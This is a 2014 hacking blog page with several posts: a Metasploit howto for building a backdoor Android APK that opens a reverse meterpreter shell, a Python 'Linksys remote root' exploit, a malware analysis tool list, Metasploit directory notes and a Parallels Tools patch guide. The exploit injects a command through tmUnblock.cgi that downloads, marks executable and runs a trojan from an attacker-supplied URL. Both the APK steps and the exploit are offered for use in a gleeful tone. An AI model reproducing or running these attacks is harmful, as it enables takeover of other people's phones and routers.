Feb 22, 2014

Howto: Getting Shell on Android with Metasploit

1. Create backdoor apk
sudo msfpayload android/meterpreter/reverse_tcp LHOST=<Hacker_IP> LPORT=<Hacker_Port> R > app.apk

2. Run Metasploit console

3. Listening for incoming connection from android
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost <Hacker_IP> (Same IP from Step#1)
  • set lport <Hacker_Port> (Same Port from Step#2)

4. Send apk to android phone

5. Install apk in android phone

6.  Run the application that was installed

7. Now watch your msfconsole, the android will connect it.

8. Try to run any post-exploitation and have fun :)

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 18, 2014

Malware Analysis Tools List

•    Process Explorer with VirusTotal Integration(http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx)
•    Process Monitor - advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity(http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx)
•    PEStudio - s a tool that can be used to perform the static investigation of any Windows executable binary(http://www.winitor.com/)
•    Automater - Automater is a URL/Domain, IP Address, and Md5 Hash OSINT tool aimed at making the analysis process easier for intrusion Analysts. Given a target (URL, IP, or HASH) or a file full of targets Automater will return relevant results from sources(http://www.tekdefense.com/automater/)
•    Noriben - Malware analysis Sandbox(https://github.com/Rurik/Noriben)
•    Regshot - registry compare utility that allows you to quickly take a snapshot of your registry and then compare it with a second one - done after doing system changes or installing a new software product(http://sourceforge.net/projects/regshot/)
•    CaptureBAT - Capture BAT is a behavioral analysis tool of applications for the Win32 operating system family. Capture BAT is able to monitor the state of a system during the execution of applications and processing of documents, which provides an analyst with insights on how the software operates even if no source code is available.(http://www.honeynet.org/node/315)

Source: http://journeyintoir.blogspot.kr/2014/02/linkz-4-mostly-malware-related-tools.html
Source: http://blog.hackersonlineclub.com/2014/02/behavior-investigation-of-malware.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Metasploit Directory Structure

Normally when you use metasploit, it will save everything that use in Metasploit into your home directory with .msf4, such as /root/.msf4, /home/hacker/.msf4. And In the .msf4 will have
- database.yml = default configuration for metasploit
- history = command history that we type
- logs/framework.log = error log
- loot/ = everything you hack such as screen capture, hash, will save in this folder.
- modules/ = All of the modules that you create personally will save here. It will load when msfconsole was run.
- plugins/ = All of the plugin that you create personally

Now if you go to Metasploit folder, you will find the structure of Metasploit.
- data/ = for information such as wordlists.
- doc = you can create it with "yard doc". In this doc directory, it keep documentation of the Metasploit. Now if you want to view it, create the web server and point the root directory of www/ to here or use `python -m SimpleHTTPServer` in here. You will got web server in port 8000. Try to browse it in your web browser, you will got doc website of Metasploit
- external = Keep external source code.
- lib = Library directory
- modules/ = All of modules in Metasploit
- plugins/ = Plugin directory for Metasploit 4
- scripts/ = Meterpreter script.
- tools/ = Tool that will do everything without Metasploit.

Source: http://hak5.org/episodes/metasploit-minute/the-metasploit-directory-structure-metasploit-minute


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Linksys Remote Root Exploit

Linksys Remote Root Exploit
infodox - insecurety research
This is the exploit this "Moon" worm uses.
Trivial blind cmd injection :)
This version crippled - uses wget.
Twitter: @info_dox
Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
import requests
import sys

def banner():
    print """\x1b[0;32m
.____    .__        __                          
|    |   |__| ____ |  | __  _________.__. ______
|    |   |  |/    \|  |/ / /  ___<   |  |/  ___/
|    |___|  |   |  \    <  \___ \ \___  |\___ \ 
|_______ \__|___|  /__|_ \/____  >/ ____/____  >
        \/       \/     \/     \/ \/         \/ 
       You are the weakest link. Goodbye.
Linksys remote root - infodox - Insecurety Research.
Version 2: Crippled (wget shelldrop only)

def upShell(wget_url, target):
""" This works with the normal busybox wget at least, and worked in testing"""
    cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" %(wget_url)
    print "{+} Planting Bomb!"
    execute_command(target=target, command=cmd)
    print "{!} TERRORISTS WIN!"

def execute_command(target, command):
    url = target + "/tmUnblock.cgi"
    injection = "-h `%s`" %(command)
    # this is a very sexy POST request. TOTALLY LEGIT.
    the_ownage = {'submit_button': '',
                  'change_action': '', 
                  'action': '', 
                  'commit': '0',
                  'ttcp_num': '2',
                  'ttcp_size': '2',
                  'ttcp_ip': injection,
                  'StartEPI': '1'}
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'}
    # it is truly mad hax.
    mad_hax = requests.post(url=url, data=the_ownage, headers=headers)

def main(args):
    if len(sys.argv) != 3:
        sys.exit("usage: %s http://target http://me.com/trojan.bin" %(sys.argv[0]))
    upShell(wget_url=sys.argv[2], target=sys.argv[1])

if __name__ == "__main__":

Source: http://pastebin.com/raw.php?i=6GDbYfmB

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 17, 2014

Howto: Installing Parallels Tools Of Parallel Desktop 9 to Kali(Linux Kernel Version 3.12

1. Mount Parallells Tools CD in virtual machine (Virtual Machine -> Install/Reinstall Parallels Tools)

2. Download the patch from http://pastebin.com/8imsrmcN
3. Make temporary copy of Parallels Tools, enter and patch it:
$ cp -R /media/$USER/Parallels\ Tools /tmp/
$ cd /tmp/Parallels\ Tools/kmods
$ tar -xaf prl_mod.tar.gz
$ patch -p1 -d prl_fs < parallels-tools-linux-3.12-prl-fs-9.0.23350.941886.patch
$ tar -czf prl_mod.tar.gz prl_eth prl_fs prl_fs_freeze prl_tg Makefile.kmods dkms.conf

4. Install normally:
$ sudo /tmp/Parallels\ Tools/install

5. Reboot

Source: http://forum.parallels.com/showthread.php?294092-Fix-Patch-for-Parallel-Tools-9-0-23350-to-support-Linux-Kernel-3-12-%28Ubuntu-14-04%29

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.